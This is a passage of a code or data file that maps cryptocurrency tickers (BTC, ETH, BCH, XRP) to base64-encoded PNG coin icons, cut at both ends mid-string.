lPjE8L2V4aWY6Q29sb3JTcGFjZT4KICAgICAgICAgPGV4aWY6UGl4ZWxZRGltZW5zaW9uPjMyPC9leGlmOlBpeGVsWURpbWVuc2lvbj4KICAgICAgPC9yZGY6RGVzY3JpcHRpb24+CiAgIDwvcmRmOlJERj4KPC94OnhtcG1ldGE+Cl8ldHMAAAZoSURBVFgJxVhdbBRVFL73zuzO7rbbXeh/y6+tpbZoVMBQIXFTVEAgUqVCFIwxUcQXH9DEB2L6ZHwxxkQxmOAToqSYEK1SJGAVSBOoJj4UoUbaCF3Wli3d/52dmXs9Z9rCzu6sbKvBm8zOzJ3z891zzj33nJXIHEdXICD/Wr96jXvR8sVvN1QE+0ZG+FxE0bkw1bVvfzgaT7+a0I2NyO+WpeP+UtenwdNHfpmtvFkBqAnsWDKRTG3nXHQYXDQLwX2okFIWkSi95GGsp8LvOXLl5OHfiwVSFICGjl1VodHYOk3wTRoX7UKQWiLA4njhoAxBEBA25pSlPpfMerwV/lNXv/4sOEVQ+PcfATR3vFjuSOoPjURT6xMZbSsntJEIEMZ1e4lMAiCUMEZGSpyOYwvLy04QRTo/2H1wwp4BsNt9CAReco1psYYxmT0VVbVXNJ3fKzislht25PlzCARQKBIbdkmOj3SD9PoZGb7W353KJbYC6OyU6ifc/mgquTalZfYYgq8XqNP8yWVF31PTB0IIlv8VZsAtuEZZlk74FOcBByVnQ+taw6Sra9p3hEjZjAtqWleNx1P71Iy2zxCihRim9myS6Wcws8R0X0nJny6nM5IxdC/EhQ0I9JcgoK1R1fRNacEX1F2fGI0OXxydEWpaoLy9s15NGq+ldX2bzvk9EFxOAhLzxrSPwc2D85yOA21NDb1I
0z/0x4abGW03sLSCNexdBUwQqBmZsWGHTI96JPf+G+e+DFL3ii2LMoS/zwUNAHMFIs5TTsFQkgTm4kFZkj9XmDg6XyFDI33HJhHAksBW/4RKmlROt+mG/oJBWJ1pvVzXIQgMO0rDTIgfnIztpb61zz4eTaiHBKXVedENDESSCeX8huJgJ32M9viI88eh/u5bJkQAM6OprbM+QjKPRbjYrGr8CcFYBTFgx+Rak4FMIkJlHmWXTCXmpYxyM8pnJE3dBRgjLhMxUOaUvnH5nd8Fe7sv/2WlsbxNAztct6Hz5/SkPhDVtS26ICuAqBSu2wEP+QN2iYBI8sp0atkWh2NS8SqO2MIyT3fYMA6ETh25YNF0hxcECiSXa9ZtP1MuSbuvRpOdMVUrg8yZzSmoxPX8yAVzgVVIpb/02rvvvfnObJVna0DeD0BG5bzSUZSZ5wogzgcAkxjJkOvTS8vLU/B823TZ0ot4Rt4akGEYAuXYctgCMDUCcyqZtP1uK6nAZCoJSwdZhVZRUAHiTSZYIb4C6vKnw+NjzH7tQEspbBQCeyJ3AAeYjKtu3RI1uWTFvKcVOD/h/DYPsRwG2AcOuCDDZG8R3KEwAS4TJeC8HJ5Zv1a6a0A7bHOT02JQiroZFbkJH8iBGJNWQpIsHLPWDgzjqRD4UUz70rIegboZz0t/qB0BUMbDquWwmgsAl+pgkHTMDJzLz6nQCgYh+sHtKbFAzhVQzHt5ZRUvaEbYHbYAUCt8EUr1vw9Ct8eAvEsLZIECiQjLKokx1/i46oLnOVsBeYOJhAtCyY0y7YbkXtKyTM0Ym2HbeSH2zejDm64bysC5C9XS4pbr8eHBOxaXdsLhLFh15vuzb12PJFarmqHcosEIpzTmcko9MhQymAcs8PDQiKZV72Ao85wss4b5qzvgNCz5Nth7CA+ZO466DTuXpScTm25EEltCulgBBU6pVYMpAjYBk2Vh8BjmbLN+s55WGLlenbAAVDvLlZvRldVtTxdVD0zcjN6uB6hNBY0BBjqhWItJrLIRIo23gBGq4PLkIcVqmDAPALk/zXlbjBJPyaLmSG1jc2Jy5FIa14IVEa9tfiDMxctx3dirCfYo4cKTt8NN02MPQbAi+glOvC9M00/VhPqetG5gTbi02JpwzX1NxxHAud+GNs62JnRT5ydhqKwsvl/Q3vnIWFx7XTeMZzgGZcE+AKtiqpd5PFcRQDSZXMgNAbFUYMNAMQv7PS7J7KvqUmX/tdPd55EPhyXTRVe2hqo15QwcngNwgsyDBAqdEKaKfMHgQ6bqWpmqaT7BUbnNwDQD9sa+wO927SuV5YPBKnKFXLx4S6DFAjMi/tvOiH2sG9A9F9UZzSCYvmNv6EwZDw5HktgbdsypN1ShNzwxy94wBwdpeBK648n/oTvOBVLb/vzicDyx467/P5ALpK59J/xDErv7/5BkA+kKdMkfapfacO4NR3N/V1+XTcrL5rB//huowCxyyA3vaAAAAABJRU5ErkJggg==',
'BTC': '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',
'ETH': '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',
'BCH': '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',
'XRP': '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